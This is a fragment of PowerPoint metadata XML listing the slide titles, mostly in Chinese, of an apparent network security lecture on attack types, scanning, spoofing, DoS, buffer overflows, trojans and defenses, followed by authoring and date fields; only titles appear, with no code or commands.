      <vt:lpstr>被动攻击——对受害者无影响</vt:lpstr>
      <vt:lpstr>主动攻击——对受害者有影响</vt:lpstr>
      <vt:lpstr>物理临近</vt:lpstr>
      <vt:lpstr>内部人员攻击</vt:lpstr>
      <vt:lpstr>软硬件配置攻击</vt:lpstr>
      <vt:lpstr>Classes of Threats</vt:lpstr>
      <vt:lpstr>Resources and their Vulnerabilities</vt:lpstr>
      <vt:lpstr>Vulnerability and Attacks</vt:lpstr>
      <vt:lpstr>Security Threats</vt:lpstr>
      <vt:lpstr>Attack Classification</vt:lpstr>
      <vt:lpstr>资源与威胁</vt:lpstr>
      <vt:lpstr>安全威胁分级</vt:lpstr>
      <vt:lpstr>稳固而知新——安全服务的部署</vt:lpstr>
      <vt:lpstr>温故而知新——安全服务的部署</vt:lpstr>
      <vt:lpstr>温故而知新—— TCP/IP协议模型安全服务的部署</vt:lpstr>
      <vt:lpstr>温故而知新——全网动态安全体系APPDRR</vt:lpstr>
      <vt:lpstr>温故而知新——安全威胁分类 </vt:lpstr>
      <vt:lpstr>攻击与防范</vt:lpstr>
      <vt:lpstr>网络中存在的安全威胁</vt:lpstr>
      <vt:lpstr>网络安全威胁国家基础设施</vt:lpstr>
      <vt:lpstr>攻击环节</vt:lpstr>
      <vt:lpstr>时间——系统漏洞 </vt:lpstr>
      <vt:lpstr>时间——软件漏洞 </vt:lpstr>
      <vt:lpstr>时间——漏洞时间性</vt:lpstr>
      <vt:lpstr>地点——攻击的位置</vt:lpstr>
      <vt:lpstr>人物——攻击者身份与攻击目的</vt:lpstr>
      <vt:lpstr>手段——常见的安全攻击方法</vt:lpstr>
      <vt:lpstr>事件——攻击的层次</vt:lpstr>
      <vt:lpstr>入侵系统的常用步骤</vt:lpstr>
      <vt:lpstr>较高明的入侵步骤</vt:lpstr>
      <vt:lpstr>攻击的一般过程及目的、内容</vt:lpstr>
      <vt:lpstr>攻击的种类</vt:lpstr>
      <vt:lpstr>预攻击概述</vt:lpstr>
      <vt:lpstr>信息收集</vt:lpstr>
      <vt:lpstr>Ping原理</vt:lpstr>
      <vt:lpstr>Ping命令行参数</vt:lpstr>
      <vt:lpstr>Windows平台ping工具</vt:lpstr>
      <vt:lpstr>ping扫描预防措施</vt:lpstr>
      <vt:lpstr>端口、服务分析</vt:lpstr>
      <vt:lpstr>网络扫描器</vt:lpstr>
      <vt:lpstr>网络扫描器</vt:lpstr>
      <vt:lpstr>网络扫描器的主要功能</vt:lpstr>
      <vt:lpstr>扫描器的基本工作原理</vt:lpstr>
      <vt:lpstr>网络扫描的主要技术</vt:lpstr>
      <vt:lpstr>主机扫描技术－传统技术</vt:lpstr>
      <vt:lpstr>ICMP echo与sweep扫描</vt:lpstr>
      <vt:lpstr>Broadcast ICMP扫描</vt:lpstr>
      <vt:lpstr>Non-Echo ICMP扫描</vt:lpstr>
      <vt:lpstr>主机扫描技术－高级技术</vt:lpstr>
      <vt:lpstr>温故而知新——扫描器的基本工作原理</vt:lpstr>
      <vt:lpstr>温故而知新——主机扫描</vt:lpstr>
      <vt:lpstr>异常IP包头</vt:lpstr>
      <vt:lpstr>在IP头中设置无效的字段值</vt:lpstr>
      <vt:lpstr>错误数据分片</vt:lpstr>
      <vt:lpstr>通过超长包探测内部路由器</vt:lpstr>
      <vt:lpstr>反向映射探测</vt:lpstr>
      <vt:lpstr>端口扫描</vt:lpstr>
      <vt:lpstr>端口扫描技术</vt:lpstr>
      <vt:lpstr>TCP连接的建立（三次握手）</vt:lpstr>
      <vt:lpstr>开放扫描TCP Connect 扫描</vt:lpstr>
      <vt:lpstr>开放扫描TCP Connect 扫描</vt:lpstr>
      <vt:lpstr>半开放扫描TCP SYN 扫描</vt:lpstr>
      <vt:lpstr>隐蔽扫描技术</vt:lpstr>
      <vt:lpstr>TCP连接的释放</vt:lpstr>
      <vt:lpstr>TCP FIN 扫描</vt:lpstr>
      <vt:lpstr>分段扫描</vt:lpstr>
      <vt:lpstr>UDP 端口扫描</vt:lpstr>
      <vt:lpstr>操作系统识别</vt:lpstr>
      <vt:lpstr>主动协议栈指纹识别</vt:lpstr>
      <vt:lpstr>被动协议栈指纹识别</vt:lpstr>
      <vt:lpstr>系统漏洞扫描</vt:lpstr>
      <vt:lpstr>获取目标主机的一般权限</vt:lpstr>
      <vt:lpstr>获取目标主机的管理权限</vt:lpstr>
      <vt:lpstr>隐藏自己的行踪</vt:lpstr>
      <vt:lpstr>网络监听</vt:lpstr>
      <vt:lpstr>网络监听（Sniffer） </vt:lpstr>
      <vt:lpstr>窃听信息 </vt:lpstr>
      <vt:lpstr>Sniffer网络环境</vt:lpstr>
      <vt:lpstr>集线器－Hub</vt:lpstr>
      <vt:lpstr>集线器内部逻辑结构</vt:lpstr>
      <vt:lpstr>共享式网络监听原理</vt:lpstr>
      <vt:lpstr>Ethernet交换机</vt:lpstr>
      <vt:lpstr>交换式网络监听原理</vt:lpstr>
      <vt:lpstr>假消息（欺骗）攻击</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>网页访问</vt:lpstr>
      <vt:lpstr>建立TCP连接</vt:lpstr>
      <vt:lpstr>TCP包头</vt:lpstr>
      <vt:lpstr>IP包头</vt:lpstr>
      <vt:lpstr>MAC帧头</vt:lpstr>
      <vt:lpstr>连接的MAC帧头部分</vt:lpstr>
      <vt:lpstr>主机路由表</vt:lpstr>
      <vt:lpstr>地址解析协议ARP</vt:lpstr>
      <vt:lpstr>地址解析协议ARP</vt:lpstr>
      <vt:lpstr>温故而知新——共享式网络监听原理</vt:lpstr>
      <vt:lpstr>温故而知新——交换式网络监听原理</vt:lpstr>
      <vt:lpstr>ARP协议</vt:lpstr>
      <vt:lpstr>地址解析协议ARP</vt:lpstr>
      <vt:lpstr>ARP: 地址解析协议</vt:lpstr>
      <vt:lpstr>ARP工作过程</vt:lpstr>
      <vt:lpstr>ARP协议存在的问题</vt:lpstr>
      <vt:lpstr>地址解析协议的安全威胁</vt:lpstr>
      <vt:lpstr>地址解析协议的安全威胁</vt:lpstr>
      <vt:lpstr>ARP欺骗</vt:lpstr>
      <vt:lpstr>ARP欺骗——假冒攻击</vt:lpstr>
      <vt:lpstr>ARP欺骗问题的原因：</vt:lpstr>
      <vt:lpstr>ARP欺骗的局限性</vt:lpstr>
      <vt:lpstr>网络接口层协议及安全威胁</vt:lpstr>
      <vt:lpstr>交换机交换机制</vt:lpstr>
      <vt:lpstr>交换机转发</vt:lpstr>
      <vt:lpstr>交换机举例</vt:lpstr>
      <vt:lpstr>交换机举例</vt:lpstr>
      <vt:lpstr>交换机举例</vt:lpstr>
      <vt:lpstr>交换机举例</vt:lpstr>
      <vt:lpstr>交换机举例</vt:lpstr>
      <vt:lpstr>网络接口层协议及安全威胁(Cont.) </vt:lpstr>
      <vt:lpstr>IP、TCP协议的安全威胁</vt:lpstr>
      <vt:lpstr>IP协议</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>TCP连接的建立</vt:lpstr>
      <vt:lpstr>TCP连接的释放</vt:lpstr>
      <vt:lpstr>TCP协议的特点</vt:lpstr>
      <vt:lpstr>拒绝服务攻击</vt:lpstr>
      <vt:lpstr>拒绝服务攻击</vt:lpstr>
      <vt:lpstr>拒绝服务(Denial of Service)</vt:lpstr>
      <vt:lpstr>DOS的基本模式</vt:lpstr>
      <vt:lpstr>DOS的基本模式</vt:lpstr>
      <vt:lpstr>DOS的基本模式</vt:lpstr>
      <vt:lpstr>DOS的基本模式</vt:lpstr>
      <vt:lpstr>DOS攻击的基本形式</vt:lpstr>
      <vt:lpstr>DOS攻击的基本形式</vt:lpstr>
      <vt:lpstr>DOS攻击的基本形式</vt:lpstr>
      <vt:lpstr>拒绝服务攻击的本质</vt:lpstr>
      <vt:lpstr>典型DoS攻击</vt:lpstr>
      <vt:lpstr>Land——自握手</vt:lpstr>
      <vt:lpstr>死ping(ping of death)</vt:lpstr>
      <vt:lpstr>死ping(ping of death)的防御：</vt:lpstr>
      <vt:lpstr>Tear drop</vt:lpstr>
      <vt:lpstr>SYN Flood（IP欺骗）</vt:lpstr>
      <vt:lpstr>SYN Flood(大量请求)</vt:lpstr>
      <vt:lpstr>Smurf（反射攻击）</vt:lpstr>
      <vt:lpstr>Smurf攻击示意图</vt:lpstr>
      <vt:lpstr>Fraggle攻击 </vt:lpstr>
      <vt:lpstr>DOS防御</vt:lpstr>
      <vt:lpstr>DDOS产生的背景</vt:lpstr>
      <vt:lpstr>温故而知新——拒绝服务(Denial of Service)</vt:lpstr>
      <vt:lpstr>温故而知新——拒绝服务攻击的本质</vt:lpstr>
      <vt:lpstr>DDOS攻击过程</vt:lpstr>
      <vt:lpstr>僵尸网络</vt:lpstr>
      <vt:lpstr>分布式拒绝服务攻击(DDoS)</vt:lpstr>
      <vt:lpstr>分布式拒绝服务攻击(DDoS)</vt:lpstr>
      <vt:lpstr>防止DoS</vt:lpstr>
      <vt:lpstr>DDoS攻击常用方式</vt:lpstr>
      <vt:lpstr>Trinoo（Tribe Flood Network）</vt:lpstr>
      <vt:lpstr>TFN攻击</vt:lpstr>
      <vt:lpstr>TFN2K</vt:lpstr>
      <vt:lpstr>Stacheldraht</vt:lpstr>
      <vt:lpstr>SHAFT </vt:lpstr>
      <vt:lpstr>DDoS的防范 </vt:lpstr>
      <vt:lpstr>企业网管理员</vt:lpstr>
      <vt:lpstr>企业网管理员</vt:lpstr>
      <vt:lpstr>企业网管理员</vt:lpstr>
      <vt:lpstr>ISP、ICP管理员</vt:lpstr>
      <vt:lpstr>骨干网络运营商</vt:lpstr>
      <vt:lpstr>UDP协议</vt:lpstr>
      <vt:lpstr>UDP协议的特点</vt:lpstr>
      <vt:lpstr>UDP的安全威胁</vt:lpstr>
      <vt:lpstr>UDP的安全威胁(Cont.)</vt:lpstr>
      <vt:lpstr>应用层：域名系统（服务）协议（DNS）</vt:lpstr>
      <vt:lpstr>应用层：域名服务协议</vt:lpstr>
      <vt:lpstr>域名服务协议(Cont.)</vt:lpstr>
      <vt:lpstr>DNS会话的验证</vt:lpstr>
      <vt:lpstr>DNS欺骗</vt:lpstr>
      <vt:lpstr>DNS欺骗（域名劫持）</vt:lpstr>
      <vt:lpstr>DNS欺骗</vt:lpstr>
      <vt:lpstr>域名服务协议安全威胁</vt:lpstr>
      <vt:lpstr>域名服务协议安全威胁(Cont.)</vt:lpstr>
      <vt:lpstr>域名服务协议安全威胁(Cont.)</vt:lpstr>
      <vt:lpstr>域名服务协议安全威胁(Cont.)</vt:lpstr>
      <vt:lpstr>超文本传输协议</vt:lpstr>
      <vt:lpstr>HTTP协议安全威胁</vt:lpstr>
      <vt:lpstr>HTTP协议安全威胁(Cont.)</vt:lpstr>
      <vt:lpstr>电子邮件传输过程</vt:lpstr>
      <vt:lpstr>常见电子邮件协议</vt:lpstr>
      <vt:lpstr>电子邮件协议安全威胁</vt:lpstr>
      <vt:lpstr>缓冲区溢出攻击</vt:lpstr>
      <vt:lpstr>缓冲区溢出及基本概念</vt:lpstr>
      <vt:lpstr>缓冲区溢出示例</vt:lpstr>
      <vt:lpstr>缓冲区溢出攻击</vt:lpstr>
      <vt:lpstr>缓冲区溢出攻击危害性</vt:lpstr>
      <vt:lpstr>缓冲区溢出攻击的内存模型</vt:lpstr>
      <vt:lpstr>堆栈示意图</vt:lpstr>
      <vt:lpstr>函数调用时堆栈状况</vt:lpstr>
      <vt:lpstr>栈溢出攻击的原理</vt:lpstr>
      <vt:lpstr>温故而知新——缓冲区溢出攻击</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>常见的情形</vt:lpstr>
      <vt:lpstr>如何能够进行系统调用？</vt:lpstr>
      <vt:lpstr>缓冲区溢出攻击	步骤</vt:lpstr>
      <vt:lpstr>攻击代码安排</vt:lpstr>
      <vt:lpstr>控制流程转移方法</vt:lpstr>
      <vt:lpstr>综合代码植入和流程控制</vt:lpstr>
      <vt:lpstr>攻击示意</vt:lpstr>
      <vt:lpstr>栈溢出攻击示例</vt:lpstr>
      <vt:lpstr>Linux系统下的栈溢出攻击</vt:lpstr>
      <vt:lpstr>NSR溢出模式</vt:lpstr>
      <vt:lpstr>RNS溢出模式</vt:lpstr>
      <vt:lpstr>R.S溢出模式－利用环境变量</vt:lpstr>
      <vt:lpstr>Shellcode C版本</vt:lpstr>
      <vt:lpstr>Shellcode 汇编版本</vt:lpstr>
      <vt:lpstr>Shellcode Opcode版本</vt:lpstr>
      <vt:lpstr>缓冲区溢出原理</vt:lpstr>
      <vt:lpstr>正常函数返回流程</vt:lpstr>
      <vt:lpstr>溢出函数返回流程</vt:lpstr>
      <vt:lpstr>溢出(控制流程)+植入代码(攻击)流程</vt:lpstr>
      <vt:lpstr>防范缓冲区溢出攻击</vt:lpstr>
      <vt:lpstr>恶意代码</vt:lpstr>
      <vt:lpstr>恶意代码</vt:lpstr>
      <vt:lpstr>恶意代码的分类</vt:lpstr>
      <vt:lpstr>恶意代码的分类（续）</vt:lpstr>
      <vt:lpstr>各种恶意代码融合趋势</vt:lpstr>
      <vt:lpstr>木马（Trojan）</vt:lpstr>
      <vt:lpstr>木马的伪装方法</vt:lpstr>
      <vt:lpstr>木马示例</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>特洛伊木马加载及启动方式</vt:lpstr>
      <vt:lpstr>加载方式－启动文件</vt:lpstr>
      <vt:lpstr>加载方式－注册表</vt:lpstr>
      <vt:lpstr>加载方式－服务</vt:lpstr>
      <vt:lpstr>加载方式－修改文件关联</vt:lpstr>
      <vt:lpstr>特洛伊木马隐蔽性</vt:lpstr>
      <vt:lpstr>木马存放位置及文件名</vt:lpstr>
      <vt:lpstr>木马基本通信方式</vt:lpstr>
      <vt:lpstr>反向连接</vt:lpstr>
      <vt:lpstr>使用UDP协议</vt:lpstr>
      <vt:lpstr>代码注入</vt:lpstr>
      <vt:lpstr>用ICMP来通讯</vt:lpstr>
      <vt:lpstr>进程隐藏</vt:lpstr>
      <vt:lpstr>特洛伊木马潜伏性</vt:lpstr>
      <vt:lpstr>其它恶意代码	</vt:lpstr>
      <vt:lpstr>后门</vt:lpstr>
      <vt:lpstr>木马与后门的防范方法</vt:lpstr>
      <vt:lpstr>欺骗技术</vt:lpstr>
      <vt:lpstr>欺骗技术</vt:lpstr>
      <vt:lpstr>DNS欺骗（域名劫持）</vt:lpstr>
      <vt:lpstr>DNS欺骗（域名劫持）步骤</vt:lpstr>
      <vt:lpstr>IP欺骗</vt:lpstr>
      <vt:lpstr>IP欺骗：改变自己的地址</vt:lpstr>
      <vt:lpstr>用程序实现IP欺骗</vt:lpstr>
      <vt:lpstr>IP欺骗：双向欺骗</vt:lpstr>
      <vt:lpstr>如何避免IP欺骗</vt:lpstr>
      <vt:lpstr>电子邮件欺骗</vt:lpstr>
      <vt:lpstr>电子邮件欺骗：使用类似的地址</vt:lpstr>
      <vt:lpstr>帐户配置</vt:lpstr>
      <vt:lpstr>邮件欺骗：直接连接smtp服务器</vt:lpstr>
      <vt:lpstr>邮件欺骗的保护</vt:lpstr>
      <vt:lpstr>Web欺骗</vt:lpstr>
      <vt:lpstr>使用类似的域名</vt:lpstr>
      <vt:lpstr>站点欺骗技术</vt:lpstr>
      <vt:lpstr>伪造、诱骗、掩盖</vt:lpstr>
      <vt:lpstr>网络钓鱼phishing</vt:lpstr>
      <vt:lpstr>改写URL</vt:lpstr>
      <vt:lpstr>Web会话劫持</vt:lpstr>
      <vt:lpstr>防止Web欺骗</vt:lpstr>
      <vt:lpstr>关于欺骗技术</vt:lpstr>
      <vt:lpstr>会话(交易)劫持</vt:lpstr>
      <vt:lpstr>TCP会话劫持(session hijacking)</vt:lpstr>
      <vt:lpstr>会话劫持示意图</vt:lpstr>
      <vt:lpstr>会话劫持的原理</vt:lpstr>
      <vt:lpstr>实施会话劫持的一般性过程</vt:lpstr>
      <vt:lpstr>进行会话劫持的工具</vt:lpstr>
      <vt:lpstr>如何防止会话劫持</vt:lpstr>
      <vt:lpstr>TCP会后劫持</vt:lpstr>
      <vt:lpstr>蜜罐技术</vt:lpstr>
      <vt:lpstr>蜜罐技术</vt:lpstr>
      <vt:lpstr>蜜罐架构</vt:lpstr>
      <vt:lpstr>网络应急响应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zeze</dc:creator>
  <cp:lastModifiedBy>wtl</cp:lastModifiedBy>
  <cp:revision>936</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-05-22T06:47:14Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-22T06:47:14Z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2052-10.1.0.6758</vt:lpwstr>
  </property>
</Properties>
</file>